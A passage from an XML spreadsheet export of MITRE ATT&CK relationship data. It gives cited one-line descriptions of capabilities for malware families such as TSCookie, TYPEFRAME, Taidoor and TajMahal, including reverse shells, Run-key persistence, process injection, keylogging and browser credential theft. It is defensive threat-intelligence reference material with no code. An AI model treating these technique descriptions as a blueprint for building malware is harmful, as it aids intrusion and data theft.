    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--d2d98eeb-4ebd-4db5-adf8-2a737306b17f</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can delete files from a compromised host.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--d3366503-cb6e-4fd3-9d93-ae9ee2faa0d4</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can use &lt;code&gt;DirectoryList&lt;/code&gt; to enumerate files in a specified directory.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--1039ed0e-216f-4eef-9a7e-c4eaa3ca0152</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can download additional modules from its C2 server.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--98557068-7d60-40d4-8294-01469aadf6fe</t>
  </si>
  <si>
    <t>The [TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) main executable has disguised itself as Microsoft’s Narrator.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--79d85e89-658e-4a38-b406-624fbe13ce9e</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;ProcessList&lt;/code&gt; for process discovery.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--40ab538b-9386-4559-8861-098503d3770f</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used FakeTLS for session authentication.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--8da08b47-36bd-4d74-91df-6fdae6d1bfff</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can copy itself into the current user’s Startup folder as “Narrator.exe” for persistence.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--7d667946-e6f1-418b-9ad3-0e3689dfaaa7</t>
  </si>
  <si>
    <t>The [TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) command and execution module can perform target system enumeration.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--07324f90-f7c1-41f7-8d08-3ecec98bbe5c</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) uses a Linear Feedback Shift Register (LFSR) algorithm for network encryption.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--8d12dc63-d18a-43ef-b4bb-f4e9f67d2251</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can use &lt;code&gt;DriveList&lt;/code&gt; to retrieve drive information.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--e1eebea8-ad12-4c3f-bbdc-10f26bbccda8</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;GetLocalTime&lt;/code&gt; for time discovery.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--bff9fc96-0b27-4c84-ad42-dcea53b907bf</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can change the timestamp of specified filenames.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--0d4d42e9-0473-42fc-b018-c79b54c7a87f</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can enable Windows CLI access and execute files.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>relationship--86c734dd-d40c-42ec-b074-0f7a4f2b55cf</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) creates then deletes log files during installation of itself as a service.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--0061f7aa-fe4e-41e5-8ebf-e9f526bda08f</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) has a command to download and execute an additional file.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--af4d45e1-1aa4-444c-b176-31df7aaf9374</t>
  </si>
  <si>
    <t>After creating a new service for persistence, [TDTESS](https://attack.mitre.org/software/S0164) sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--d2fa2382-dcfc-4cff-969b-2b5ec12dc406</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) provides a reverse shell on the victim.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--ce424541-5cfa-4885-ad62-f3f70fa27099</t>
  </si>
  <si>
    <t>If running as administrator, [TDTESS](https://attack.mitre.org/software/S0164) installs itself as a new service named bmwappushservice to establish persistence.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--e2b4bcf2-58a6-49ed-bc72-21226ff419bd</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</si>
  <si>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</si>
  <si>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relationship--bccf4511-1e01-42ed-ab75-65d558e3fa3f</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) files had names that resembled legitimate Window file and directory names.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>relationship--b695f761-40ed-4988-935c-a1cf5e67c8d8</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) modified the Registry to create a Windows service for itself on a compromised host.(Citation: Check Point Sunburst Teardrop December 2020)</t>
  </si>
  <si>
    <t>relationship--69356661-76fb-46fe-94ce-d029ee7f8a64</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</si>
  <si>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</si>
  <si>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relationship--570df7f7-f2d5-4de9-ba74-4adfa99e980f</t>
  </si>
  <si>
    <t xml:space="preserve">[TEARDROP](https://attack.mitre.org/software/S0560) checked that &lt;code&gt;HKU\SOFTWARE\Microsoft\CTF&lt;/code&gt; existed before decoding its embedded payload.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>relationship--184739bd-f45e-4f2b-8caf-19e2cb30ae92</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) ran as a Windows service from the &lt;code&gt;c:\windows\syswow64&lt;/code&gt; folder.(Citation: Check Point Sunburst Teardrop December 2020)(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>relationship--9d70b17c-d3b7-43a2-9c35-d0b80bec2ec0</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>relationship--0d9114a6-6452-4668-95eb-f91bcb300d2d</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) executes cmd.exe to provide a reverse shell to adversaries.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>relationship--b8e6bb17-9652-464d-8e5d-bd21e1f69a2e</t>
  </si>
  <si>
    <t>When a document is found matching one of the extensions in the configuration, [TINYTYPHON](https://attack.mitre.org/software/S0131) uploads it to the C2 server.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--ff922dd7-21b6-4f95-bb8b-080d0dee6655</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--6cfd1f0f-0355-4b1a-af29-84ed992bbb71</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) has used XOR with 0x90 to obfuscate its configuration file.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--4afcb9c9-e490-446b-97b1-1c151974242f</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) installs itself under Registry Run key to establish persistence.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--753f9861-f0b8-4467-ac5e-4457bd350095</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--426c8308-0856-4dad-85e6-87df276cfa69</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to decrypt, load, and execute a DLL and its resources.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--2b062058-3345-4993-9715-6ad6e98dc2ad</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to discover drive information on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--4b2baed3-8e3c-4ab6-9b92-f147a9ab7d13</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to upload and download files to and from the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--1e54c837-6d59-40dc-a114-3bcef0037327</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--d15c7116-2d00-48cd-9003-1ab6fc4a0076</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) can use ICMP to receive information on the destination server.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>relationship--20c30f4a-ff6f-4861-a88a-77d437374994</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to list processes on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--1cc625dd-3079-4aa5-99f5-db1897795500</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>relationship--2a7a5ee2-e949-4d25-895a-43ba0bc8cc33</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to proxy communications with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>relationship--7c119557-d417-4708-a024-5be9c4d4d86c</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has encrypted network communications with RC4.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--bfe30cdf-a0c8-440d-b471-d9fef00c559b</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to identify the IP of the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--ce801c17-399a-426a-a4ec-1b7361ba9d4d</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--2978353c-a652-4d42-a5da-4b937b09c8cf</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to execute shell commands on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--183b5c91-0424-4a26-830c-cdeb8959b72a</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of injecting code into the APC queue of a created [Rundll32](https://attack.mitre.org/techniques/T1218/011) process as part of an "Early Bird injection."(Citation: CyberBit Early Bird Apr 2018)</t>
  </si>
  <si>
    <t>relationship--02e3008d-1b2b-4824-b715-d6d8335cc4b2</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of downloading additional files.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>relationship--1251d1e2-21d3-48f2-a869-44507b34943a</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of writing to a Registry Run key to establish.(Citation: CyberBit Early Bird Apr 2018)</t>
  </si>
  <si>
    <t>relationship--f2d1bf8c-6541-40af-8c84-48c7570fb50b</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of taking screenshots.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>relationship--09c63f56-1c5b-4195-9d1a-73b77865ffb8</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of gathering system information.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>relationship--9ee2a9f3-9174-4927-8561-56d5c6723b9e</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of creating a reverse shell.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>relationship--7415b249-520c-4ec9-aa03-b12b5b22f6be</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</si>
  <si>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</si>
  <si>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relationship--77b9e1c5-8241-4260-8125-4bc2e1206b9c</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can open the Windows Firewall on the victim’s machine to allow incoming connections.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--448ea71c-ebfa-4604-bb8e-0c8c997c746a</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can delete files off the system.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--f6557436-3564-4128-b93e-2c246ec00834</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can search directories for files on the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--fe1c5e06-ea4b-4286-af2d-984a095f7924</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</si>
  <si>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</si>
  <si>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relationship--3a11bfd9-1c27-4f54-926d-883cfa9b69cd</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can upload and download files to the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--42914dfa-9644-4bf6-bb5f-45c0e3303d7b</t>
  </si>
  <si>
    <t>A Word document delivering [TYPEFRAME](https://attack.mitre.org/software/S0263) prompts the user to enable macro execution.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--6d8d9425-86ec-42d3-bce5-2af53d4f1fad</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</si>
  <si>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</si>
  <si>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relationship--ceb66bd9-3e75-4559-a0b9-3339a926cde6</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) has used ports 443, 8080, and 8443 with a FakeTLS method.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--d21527b8-a8c8-4c95-9061-21c49155232e</t>
  </si>
  <si>
    <t>APIs and strings in some [TYPEFRAME](https://attack.mitre.org/software/S0263) variants are RC4 encrypted. Another variant is encoded with XOR.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--573e7f53-26e9-4eae-af0e-308d11192f57</t>
  </si>
  <si>
    <t>A [TYPEFRAME](https://attack.mitre.org/software/S0263) variant can force the compromised system to function as a proxy server.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--83e001e3-95d3-43d9-9f8c-8b954686287a</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can gather the disk volume information.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--d0e4c9af-070a-43bd-82e6-c047f7ebf491</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) has used a malicious Word document for delivery with VBA macros for execution.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--ccd237b6-c7d6-4941-a1f2-cb563ae90b79</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can uninstall malware components using a batch script.(Citation: US-CERT TYPEFRAME June 2018) [TYPEFRAME](https://attack.mitre.org/software/S0263) can execute commands using a shell.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--dd5add56-119e-4d40-983b-f2a41ba98abf</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) variants can add malicious DLL modules as new services.[TYPEFRAME](https://attack.mitre.org/software/S0263) can also delete services from the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>relationship--cd63c221-6dc1-4b88-ab82-8f64493cbacd</t>
  </si>
  <si>
    <t>S0011</t>
  </si>
  <si>
    <t>Taidoor</t>
  </si>
  <si>
    <t>malware--b143dfa4-e944-43ff-8429-bfffc308c517</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can upload data and files from a victim's machine.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>relationship--6b9cb729-6a81-4ec2-91c1-7141f8691ee4</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use a stream cipher to decrypt stings used by the malware.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--5b928b39-ce48-47b8-82bc-d4ec63b1e3f4</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can perform DLL loading.(Citation: TrendMicro Taidoor)(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--5e840479-61c1-44f5-8cb8-0e61ffe12b89</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use &lt;code&gt;DeleteFileA&lt;/code&gt; to remove files from infected hosts.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--399c8f98-ead6-40c5-9dba-13e25e338fd8</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can search for specific files.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--c9349d94-ea50-4446-a50e-bb920812aded</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has downloaded additional files onto a compromised host.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>relationship--665f8af6-bdac-4574-9d8c-9c7829e0e4e7</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has relied upon a victim to click on a malicious email attachment.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>relationship--dad14304-3539-4de9-b50b-c79d2d376ab6</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has the ability to modify the Registry on compromised hosts using &lt;code&gt;RegDeleteValueA&lt;/code&gt; and &lt;code&gt;RegCreateKeyExA&lt;/code&gt;.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--2e8e6362-ce7e-4fd5-8c9b-8b85b6f35a58</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</si>
  <si>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</si>
  <si>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relationship--3502c424-9bf1-4780-a5bd-a0d3830e1251</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use TCP for C2 communications.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--ff5b6f0f-df63-4561-8c62-4894b3e424b7</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use encrypted string blocks for obfuscation.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--d4d74097-2e4a-44c7-bda0-8c0dee2b5813</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use &lt;code&gt;GetCurrentProcessId&lt;/code&gt; for process discovery.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--ced0348f-1bc8-461b-8123-a1b3aeb38e94</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can query the Registry on compromised hosts using &lt;code&gt;RegQueryValueExA&lt;/code&gt;.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--5ccac771-a984-4f06-b109-21ea7cd60b02</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has modified the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key for persistence.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>relationship--f8f21a3f-8bc7-49ee-a602-80df0e5e8bf4</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has been delivered through spearphishing emails.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>relationship--416fd781-438e-4130-bfac-8ac653e85c2c</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) uses RC4 to encrypt the message body of HTTP content.(Citation: TrendMicro Taidoor)(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--34e75ef5-b2de-41dc-96d3-2c5388c570be</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has collected the MAC address of a compromised host; it can also use &lt;code&gt;GetAdaptersInfo&lt;/code&gt; to identify network adapters.(Citation: TrendMicro Taidoor)(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--4f780084-b507-420b-bb20-1a45e4919eda</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can use &lt;code&gt;GetLocalTime&lt;/code&gt; and &lt;code&gt;GetSystemTime&lt;/code&gt; to collect system time.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--08d7395b-b3e6-4ae2-be46-31347d1d5eaa</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) has used HTTP GET and POST requests for C2.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>relationship--32e70454-9206-4f26-b2d1-c9fa106cbd48</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can copy cmd.exe into the system temp folder.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)</t>
  </si>
  <si>
    <t>relationship--2124d78b-edbb-4334-9bbc-fd7dc62fcdd0</t>
  </si>
  <si>
    <t>S0467</t>
  </si>
  <si>
    <t>TajMahal</t>
  </si>
  <si>
    <t>malware--b51797f7-57da-4210-b8ac-b8632ee75d70</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--120b6ead-4c4a-4f99-8509-d4ae3d4afea6</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture VoiceIP application audio on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--404dfda0-7019-4f0e-a831-4b7c594916e8</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index and compress files into a send queue for exfiltration.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--5197fd7a-766f-45da-87f5-c469377460d1</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to manage an automated queue of egress files and commands sent to its C2.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--9cc4cd5d-7b10-4dd7-8fd9-90288aa8b5be</t>
  </si>
  <si>
    <t xml:space="preserve">[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal data from the clipboard of an infected host.(Citation: Kaspersky TajMahal April 2019)
</t>
  </si>
  <si>
    <t>relationship--f283af63-1fdf-49d3-8a56-304c5be07a83</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal documents from the local system including the print spooler queue.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--ea05b76d-c443-4b41-8d02-d90b965bd184</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--cad9bdcc-41b3-44e2-98d2-fb07fe268838</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject DLLs for malicious plugins into running processes.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--c7d6694e-cfbf-4883-9f4c-8fb3f187e6ae</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to send collected files over its C2.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--655005cc-a289-4878-8dc0-64f0c7d167c4</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index files from drives, user profiles, and removable drives.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--bfd1c3ca-ea2c-4b0e-8b0a-815b8ebb4dfb</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture keystrokes on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--eda8746d-ef63-450b-ab75-c2c97d94db44</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) can set the &lt;code&gt;KeepPrintedJobs&lt;/code&gt; attribute for configured printers in &lt;code&gt;SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers&lt;/code&gt; to enable document stealing.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--91c175b7-5c8e-4534-82b1-9bdb1b709a34</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has used an encrypted Virtual File System to store plugins.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--f43dedfa-261d-41af-bb74-e1f2eff5cbae</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify connected Apple devices.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--ee1558f7-5b93-49c7-89c8-b3151cbefb84</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify running processes and associated plugins on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--7f31ac80-5e21-4449-8bb3-9c2ad943dc08</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--3edc3698-c8a9-4212-b34e-1f3a44fbd00d</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--44aab0bc-80d5-4c6b-9acf-ceb9cc30f443</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject the &lt;code&gt;LoadLibrary&lt;/code&gt; call template DLL into running processes.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--b4ef6c6e-d7aa-451a-b071-faf0138cfbff</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the Internet Explorer (IE) version on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--8455e704-68fd-4610-b63d-0d124a660802</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>relationship--b9b622ad-856a-48f9-a768-ef05bd2914fe</t>
  </si>
  <si>
